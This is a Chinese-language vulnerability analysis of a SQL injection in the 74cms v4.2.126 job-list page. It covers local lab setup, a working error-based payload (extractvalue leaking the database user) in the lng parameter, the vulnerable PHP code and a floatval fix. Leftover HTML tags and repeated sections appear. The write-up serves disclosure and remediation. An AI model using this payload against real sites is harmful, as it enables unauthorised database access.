74cms v4.2.126 SQL注入漏洞分析与利用<\/h1>

0x00 漏洞概述<\/h2>
74cms v4.2.126版本存在SQL注入漏洞，该漏洞位于职位列表功能中，由于对用户输入的经纬度参数(lat\/lng)未进行充分过滤，导致攻击者可以构造恶意SQL语句进行注入攻击。<\/p>

0x01 环境搭建<\/h2>

1. 下载安装<\/h3>

下载地址: http:\/\/www.74cms.com\/download\/index.html<\/a><\/li>

安装骑士人才系统基础版<\/li> <\/ul>

2. 升级到最新版<\/h3>

进入后台检查版本<\/li>
如果不是最新版，点击升级<\/li>

本地环境可能遇到"域名不合法升级失败"错误，解决方法：

修改文件：74cms\upload\Application\Admin\Controller\ApplyController.class.php<\/code><\/li>

查找所有$_SERVER['HTTP_HOST']<\/code>改为http:\/\/baidu.com<\/code><\/li>
<\/ul>
<\/li>
<\/ol>
0x02 测试数据准备<\/h2>
1. 注册商家账号<\/h3>

后台注册商家用户<\/li>
登录前台商家账号<\/li>
设置商家信息：http:\/\/74cms.test\/index.php?m=&c=company&a=com_info<\/code><\/li>
发布职位：http:\/\/74cms.test\/index.php?m=&c=Company&a=jobs_add<\/code><\/li>
<\/ol>
2. 注册普通用户账号<\/h3>

前台注册普通用户(需要短信验证)<\/li>
登录普通用户账号<\/li>
<\/ol>
0x03 漏洞利用<\/h2>
1. 漏洞URL<\/h3>
http:\/\/74cms.test\/index.php?m=&c=jobs&a=jobs_list&lat=23.176465&range=20&lng=113.35038'
<\/code><\/pre>
2. 参数说明<\/h3>

lat<\/code>: 纬度(不超过1)<\/li>
lng<\/code>: 经度(不超过1)<\/li>
range<\/code>: 范围<\/li>
<\/ul>
3. Payload示例<\/h3>
http:\/\/74cms.test\/index.php?m=&c=jobs&a=jobs_list&lat=23.176465&range=20&lng=113.35038* PI() \/ 180 - map_x PI() \/ 180) \/ 2),2))) 1000) AS map_range FROM qs_jobs_search j WHERE (extractvalue (1,concat(0x7e,(SELECT USER()), 0x7e))) -- a
<\/code><\/pre>
0x04 漏洞分析<\/h2>
1. 请求路由<\/h3>

M(模块): home (由DEFAULT_MODULE<\/code>参数决定)<\/li>
C(控制器): jobs<\/li>
A(方法): jobs_list<\/li>
<\/ul>
2. 漏洞位置<\/h3>

视图文件: 74cms\upload\Application\Home\View\default\Jobs\jobs_list.html<\/code><\/li>
标签库驱动文件: 74cms\upload\Application\Common\qscmstag\jobs_listTag.class.php<\/code><\/li>
<\/ul>
3. 漏洞成因<\/h3>

用户可控的lat<\/code>和lng<\/code>参数直接赋值给$this->params<\/code><\/li>
这些参数未经充分过滤就用于SQL查询的field<\/code>字段<\/li>
最终构造的SQL语句中直接拼接了用户输入<\/li>
<\/ol>
4. 关键代码<\/h3>
$this-><\/span>field<\/span> =<\/span> "id,ROUND(6378.138*2*ASIN(SQRT(POW(SIN(("<\/span>.<\/span>$this-><\/span>params<\/span>['lat'<\/span>].<\/span>"*PI()\/180-map_y*PI()\/180)\/2),2)+COS("<\/span>.<\/span>$this-><\/span>params<\/span>['lat'<\/span>].<\/span>"*PI()\/180)*COS(map_y*PI()\/180)*POW(SIN(("<\/span>.<\/span>$this-><\/span>params<\/span>['lng'<\/span>].<\/span>"*PI()\/180-map_x*PI()\/180)\/2),2)))*1000) AS map_range"<\/span>;
<\/span><\/span><\/code><\/pre>0x05 修复方案<\/h2>
将用户输入强制转换为浮点型：<\/p>
$this-><\/span>field<\/span> =<\/span> "id,ROUND(6378.138*2*ASIN(SQRT(POW(SIN(("<\/span>.<\/span>floatval<\/span>($this-><\/span>params<\/span>['lat'<\/span>]).<\/span>"*PI()\/180-map_y*PI()\/180)\/2),2)+COS("<\/span>.<\/span>floatval<\/span>($this-><\/span>params<\/span>['lat'<\/span>]).<\/span>"*PI()\/180)*COS(map_y*PI()\/180)*POW(SIN(("<\/span>.<\/span>floatval<\/span>($this-><\/span>params<\/span>['lng'<\/span>]).<\/span>"*PI()\/180-map_x*PI()\/180)\/2),2)))*1000) AS map_range"<\/span>;
<\/span><\/span><\/code><\/pre>0x06 总结<\/h2>
该漏洞利用了74cms在计算地理位置距离时对用户输入处理不当的问题，通过构造恶意的经纬度参数实现SQL注入。修复方案是对所有用户输入进行强制类型转换，确保其只能作为数值使用。<\/p>

74cms v4.2.126 SQL注入漏洞分析与利用<\/h1>

0x00 漏洞概述<\/h2> 74cms v4.2.126版本存在SQL注入漏洞，该漏洞位于职位列表功能中，由于对用户输入的经纬度参数(lat\/lng)未进行充分过滤，导致攻击者可以构造恶意SQL语句进行注入攻击。<\/p>

0x01 环境搭建<\/h2>

0x02 测试数据准备<\/h2>

0x03 漏洞利用<\/h2>

0x04 漏洞分析<\/h2>

0x06 总结<\/h2> 该漏洞利用了74cms在计算地理位置距离时对用户输入处理不当的问题，通过构造恶意的经纬度参数实现SQL注入。修复方案是对所有用户输入进行强制类型转换，确保其只能作为数值使用。<\/p>

0x00 漏洞概述<\/h2>
74cms v4.2.126版本存在SQL注入漏洞，该漏洞位于职位列表功能中，由于对用户输入的经纬度参数(lat\/lng)未进行充分过滤，导致攻击者可以构造恶意SQL语句进行注入攻击。<\/p>

0x06 总结<\/h2>
该漏洞利用了74cms在计算地理位置距离时对用户输入处理不当的问题，通过构造恶意的经纬度参数实现SQL注入。修复方案是对所有用户输入进行强制类型转换，确保其只能作为数值使用。<\/p>